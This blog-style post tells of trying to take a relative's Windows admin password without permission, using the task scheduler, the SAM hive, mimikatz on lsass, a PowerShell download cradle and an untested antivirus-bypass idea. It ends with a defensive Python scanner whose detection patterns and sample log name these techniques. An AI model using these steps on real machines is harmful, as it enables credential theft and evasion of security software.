So recently I was at my grandma’s and she only had access to a low-privileged account, as my uncle had configured the system and set a password on the admin account. I figured it would be a nice challenge to get my hands on his password, or get higher privileges in some other way. One thing though, I had to achieve this without rebooting the device.
Attempt #1 - Task scheduler
The task scheduler allows running programs as SYSTEM, but unfortunately that doesn't work on Windows 7. Furthermore, when attempting to run at <time> /interactive cmd.exe or just at, I was getting an
Then I read something about creating a service that would run cmd.exe, but I still have too little knowledge about services, so I didn't try it.
Attempt #2 - SAM
There is a registry hive called SAM (Security Account Manager), which holds all the password hashes. Thanks to Wikipedia we know it lives in %SystemRoot%/system32/config/SAM and that the file is locked and inaccessible while Windows is running. However, it is also exposed in the registry under HKLM/SAM. So a quick jump to RegEdit and ... Access denied.
I remembered one more thing: passwords are kept in plain text in LSA memory, which led to the next attempt.
Attempt #3 - mimikatz
So there's this great tool called mimikatz by Benjamin Delpy (gentilkiwi). It's available on GitHub. One of its modules can read the protected memory of the lsass.exe process. I was hoping to be done soon. And then came the problem: Avast Antivirus. Yeah, I wasn't even able to download mimikatz. Fortunately it's possible with PowerShell: PS> (new-object System.Net.WebClient).DownloadFile( $url, $path ). But I downloaded a .zip file, and during extraction Avast scanned it for viruses. And even when I isolated the file, Avast performed a scan on the first run. I think it actually could be bypassed by having a clean program, anything, running it, having Avast check it and add its path to clean files, then renaming mimikatz.exe to this clean file, and then running it. I didn't check that last part, I was too tired, but I'll make sure to do it next time and see what I can get.
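From the defender's side, the two things worth noticing in this story are the PowerShell WebClient download cradle and any script that references mimikatz or lsass.exe. As an added example (not code from the original post), here is a small scanner over PowerShell script-block log text that flags both; the log lines are constructed for illustration.

```python
import re

# Rule 1: the WebClient download cradle quoted in the post, in any spelling or
# spacing ("(new-object System.Net.WebClient).DownloadFile( $url, $path )",
# "$wc = New-Object Net.WebClient; $wc.DownloadString(...)", ...).
def _webclient_download(line):
    t = line.lower()
    return "net.webclient" in t and re.search(r"\.download(file|string)\s*\(", t) is not None

# Rule 2: direct references to the credential-dumping tool or to the lsass process.
_LSASS_RE = re.compile(r"\b(mimikatz|lsass)\b", re.IGNORECASE)

def _lsass_tooling(line):
    return _LSASS_RE.search(line) is not None

RULES = {
    "webclient_download": _webclient_download,
    "lsass_tooling": _lsass_tooling,
}

def scan_script_blocks(lines):
    """Return (line_number, rule_name) for every log line that trips a rule."""
    hits = []
    for n, line in enumerate(lines, start=1):
        for name, rule in RULES.items():
            if rule(line):
                hits.append((n, name))
    return hits

# Constructed sample of script-block log text (one script block per line).
SAMPLE_LOG = [
    "4104 ScriptBlock: Get-ChildItem C:\\Users\\grandma\\Documents",
    "4104 ScriptBlock: (new-object System.Net.WebClient).DownloadFile( $url, $path )",
    "4104 ScriptBlock: $wc = New-Object Net.WebClient; $wc.DownloadString('http://example.invalid/x.ps1')",
    "4104 ScriptBlock: Start-Process .\\mimikatz.exe",
    "4104 ScriptBlock: Get-Process | Where-Object Name -eq 'lsass'",
]

if __name__ == "__main__":
    for n, rule in scan_script_blocks(SAMPLE_LOG):
        print(f"line {n}: {rule}")
```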